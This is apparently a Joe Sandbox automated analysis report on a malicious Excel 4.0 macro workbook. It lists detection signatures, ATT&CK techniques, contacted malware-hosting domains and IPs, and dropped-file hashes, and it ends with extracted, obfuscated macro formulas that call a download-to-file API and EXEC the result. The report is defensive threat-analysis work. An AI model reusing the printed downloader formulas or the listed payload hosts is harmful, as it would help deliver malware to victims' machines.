Play interactive tourEdit tour
Analysis Report documents-1660683173.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Machine Learning detection for dropped file | Show sources |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior |
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: |
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kautilyaclasses.com | 192.185.56.250 | true | false | unknown | |
bodylanguage.santulan.co.in | 111.118.215.222 | true | true | unknown | |
corwin-tommie06f.ru.com | 8.211.4.209 | true | false | unknown | |
katelynn9506a.ru.com | 8.211.4.209 | true | false | unknown | |
kullumanalitours.com | 103.211.216.55 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown | |
false |
| unknown | |
true |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
103.211.216.55 | kullumanalitours.com | Seychelles | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false | |
192.185.56.250 | kautilyaclasses.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
8.211.4.209 | corwin-tommie06f.ru.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false | |
111.118.215.222 | bodylanguage.santulan.co.in | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382825 |
Start date: | 06.04.2021 |
Start time: | 18:00:12 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 43s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | documents-1660683173.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLSM@11/12@5/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
8.211.4.209 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
111.118.215.222 | Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 124025 |
Entropy (8bit): | 5.93057231705895 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | 670BD3713D1FC5F4B0766C4ABADA5CCC |
SHA1: | FF7F7D9AB1494A4BA3EEB4F942E68D69A96F4771 |
SHA-256: | AF81590CA263392F0124D318604A06785F88696FA623DD16A6C57F6E22A1BD65 |
SHA-512: | 6155E4D073C160CA1DD65590D0BA21E49A999F1E708D0E5BF542776B6F0840CD1991E40BE9D8E56E56224A1576616FAA46680DFE565E054E39E946608ACAC58D |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | http://bodylanguage.santulan.co.in/ds/index.html |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8854 |
Entropy (8bit): | 7.949751503848125 |
Encrypted: | false |
SSDEEP: | 192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj |
MD5: | 780FD0ABF9055E2D8FA1BAB6D4B9163E |
SHA1: | CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE |
SHA-256: | 6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2 |
SHA-512: | 8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96845 |
Entropy (8bit): | 7.870661659091498 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgJc:GJIW9bTdS7lMHfD9ByrtyOG7ZVxEt |
MD5: | 3479245B9F33A9E1F03900890125DEE3 |
SHA1: | 68E5533F4FBB045D7D6A84D63DB09ECB7B670CCE |
SHA-256: | 21715C2FC085ADB028AB1E5A73B0F815B69DB64F7FFABB41242B1C6C3A43C03C |
SHA-512: | 8E4928A0FBFE36512648002E3E6FE1A52FDEECABE83603DB85FDD5764537B65AE77E43E626F332BB647B13F9CA4B1AFC97B9360492C155946C44BBA35DB9B7D0 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.4687971528838295 |
Encrypted: | false |
SSDEEP: | 12:85QAvcLgXg/XAlCPCHaXgzB8IB/vyPUAX+Wnicvb8X+bDtZ3YilMMEpxRljKwXcs:85I/XTwz6IgYePDv3qdwrNru/ |
MD5: | 7F920880AA695C9DF2B102FB03974AEF |
SHA1: | 63965E298D95CCBC4EF5866EA811AAFDB3E7EB22 |
SHA-256: | E8B89A78169A51E950A368A0BFDC22BFD7E3080CAC8FC79A49ABC22BC5CB17A6 |
SHA-512: | C02C1BDC2E42B999AC7D4CA46480A10373A9B711B3C75D8C2820D8966E0DB8A48321C869F3D2E659601369C3EF0FF9A37877410AF9AA47F03AA0606FB78CB29A |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2138 |
Entropy (8bit): | 4.528643007870141 |
Encrypted: | false |
SSDEEP: | 48:8B/XT3Ik7WZhwIqQh2B/XT3Ik7WZhwIqQ/:8B/XLIk7W4IqQh2B/XLIk7W4IqQ/ |
MD5: | AC01E803A9FED5CEA946118AD8320EDD |
SHA1: | 90AF5745FC9946CD42CC1220C057AA9048E49582 |
SHA-256: | C1581D468241CD0ECEA9A02E5CD3E97C40613BAE7A5AF2DC3634B96F4AE7DC91 |
SHA-512: | D85F6C3799893ACE3C68564C8CB8E01200D7C28EA518466595A434B5A2CEA6F07DF4BC91802BE0426BC40FE0DB2497BCFFEE156EB87EBD64BA206486B9F6CB6F |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.693504916588958 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LRmnpzCZELRmnpzCmxWKS9LRmnpzCv:dj49LcBgELcBC9LcBs |
MD5: | 8380702CB2A3A628F83F6844DDF7E8D9 |
SHA1: | A7BDA2F60F42F4D202BFEA470BE141F6C2260F8A |
SHA-256: | B6F458D5D03DD31FE1299F4B4FEAB548379FB19B473B8CE0613ADE00E73EB421 |
SHA-512: | 0269950A40CD2B18001CC1ACE3EB00731A498B9B11866ECDAA36A9724C7286261BF2782361DD10DE8DEE58E070241B47F835D0DB390C922A7165E97B6DDE8EB5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96845 |
Entropy (8bit): | 7.870661659091498 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgJc:GJIW9bTdS7lMHfD9ByrtyOG7ZVxEt |
MD5: | 3479245B9F33A9E1F03900890125DEE3 |
SHA1: | 68E5533F4FBB045D7D6A84D63DB09ECB7B670CCE |
SHA-256: | 21715C2FC085ADB028AB1E5A73B0F815B69DB64F7FFABB41242B1C6C3A43C03C |
SHA-512: | 8E4928A0FBFE36512648002E3E6FE1A52FDEECABE83603DB85FDD5764537B65AE77E43E626F332BB647B13F9CA4B1AFC97B9360492C155946C44BBA35DB9B7D0 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 124025 |
Entropy (8bit): | 5.93057231705895 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | 670BD3713D1FC5F4B0766C4ABADA5CCC |
SHA1: | FF7F7D9AB1494A4BA3EEB4F942E68D69A96F4771 |
SHA-256: | AF81590CA263392F0124D318604A06785F88696FA623DD16A6C57F6E22A1BD65 |
SHA-512: | 6155E4D073C160CA1DD65590D0BA21E49A999F1E708D0E5BF542776B6F0840CD1991E40BE9D8E56E56224A1576616FAA46680DFE565E054E39E946608ACAC58D |
Malicious: | true |
Antivirus: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.882184978149695 |
TrID: |
|
File name: | documents-1660683173.xlsm |
File size: | 96877 |
MD5: | cf8cbce9bb25d9081b2da19c6f1c1c70 |
SHA1: | e014ec63d11a673fd6a655cb20055a723eba2fe5 |
SHA256: | 9a59e089d7b593c0b0651ad43945f19c10c67719b7e01814f4007f253db6e286 |
SHA512: | 6c46ff93eedaff43cd9834602739d961a78f9d55148893d570343b2b9a01b99f6a9fd7df3f7ede0a954300f5372d89caf5129aea6f60c87ab3cf212fa631b705 |
SSDEEP: | 1536:491M4Kfra8zxQz8jbztonsBjFC6QomaIRUxPLe96bGAfe2hawno:491M4kra8Wz8jbzSn4BC6Qdkx60WMo |
File Content Preview: | PK..........!...`.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "documents-1660683173.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\oeiwkd""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM23,before.2.0.0.sheet!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",A